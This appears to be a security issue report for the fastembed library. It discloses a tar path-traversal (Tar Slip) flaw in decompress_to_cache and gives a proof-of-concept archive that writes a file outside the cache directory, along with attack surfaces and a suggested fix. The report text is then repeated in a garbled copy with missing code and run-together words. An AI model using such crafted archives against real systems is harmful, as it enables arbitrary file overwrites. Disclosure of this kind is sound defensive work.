Summary
The decompress_to_cache method uses tarfile.extractall() without sanitizing member paths, making it vulnerable to Zip Slip / Tar Slip (CVE-2007-4559 class). A malicious tar archive can write files to arbitrary locations outside cache_dir.
Note: This is related to but distinct from #327, which tracks the DeprecationWarning/platform compatibility aspect. This issue specifically addresses the security vulnerability — path traversal allowing arbitrary file writes.
Affected Code
File: fastembed/common/model_management.py, lines 304–311
@classmethod
def decompress_to_cache(cls, targz_path: str, cache_dir: str) -> str:
# ...
with tarfile.open(targz_path, "r:gz") as tar:
tar.extractall(
path=cache_dir, # No filter, no member sanitization
)
Reproduction
import tarfile, os, tempfile, io
# Create a malicious tar that writes outside the intended directory
with tempfile.NamedTemporaryFile(suffix='.tar.gz', delete=False) as f:
evil_tar = f.name
with tarfile.open(evil_tar, 'w:gz') as tar:
payload = b"PWNED"
info = tarfile.TarInfo(name="../../tmp/fastembed_pwned.txt")
info.size = len(payload)
tar.addfile(info, io.BytesIO(payload))
# Call decompress_to_cache with this tar
cache_dir = tempfile.mkdtemp()
from fastembed.common.model_management import ModelManagement
ModelManagement.decompress_to_cache(evil_tar, cache_dir)
# File written outside cache_dir:
print(os.path.exists("/tmp/fastembed_pwned.txt")) # True
Attack Surface
- Custom model URLs via
add_custom_model() pointing to attacker-controlled servers
- Compromised HuggingFace repos or GCS buckets (supply chain attack)
- MITM on HTTP redirects
Impact
- Arbitrary file write to any path writable by the process (SSH keys, cron jobs, Python packages, shell configs)
- On Python 3.14, the default
filter changes to 'data', which will silently change extraction behavior and may break existing archives
Suggested Fix
Add path filtering to block traversal:
@classmethod
def decompress_to_cache(cls, targz_path: str, cache_dir: str) -> str:
with tarfile.open(targz_path, "r:gz") as tar:
# Python 3.12+: use filter='data' to block traversal
# Python 3.11 and earlier: manual sanitization
try:
tar.extractall(path=cache_dir, filter='data')
except TypeError:
# Python < 3.12 fallback
for member in tar.getmembers():
member_path = os.path.realpath(os.path.join(cache_dir, member.name))
if not member_path.startswith(os.path.realpath(cache_dir) + os.sep):
raise ValueError(f"Unsafe tar member path: {member.name}")
tar.extractall(path=cache_dir)
Found via automated codebase analysis. Confirmed independently by three reviewers (Claude, Codex, Gemini).
Summary
The
decompress_to_cachemethod usestarfile.extractall()without sanitizing member paths, making it vulnerable to Zip Slip / Tar Slip (CVE-2007-4559 class). A malicious tar archive can write files to arbitrary locations outsidecache_dir.Note: This is related to but distinct from #327, which tracks the DeprecationWarning/platform compatibility aspect. This issue specifically addresses the security vulnerability — path traversal allowing arbitrary file writes.
Affected Code
File:
fastembed/common/model_management.py, lines 304–311Reproduction
Attack Surface
add_custom_model()pointing to attacker-controlled serversImpact
filterchanges to'data', which will silently change extraction behavior and may break existing archivesSuggested Fix
Add path filtering to block traversal:
Found via automated codebase analysis. Confirmed independently by three reviewers (Claude, Codex, Gemini).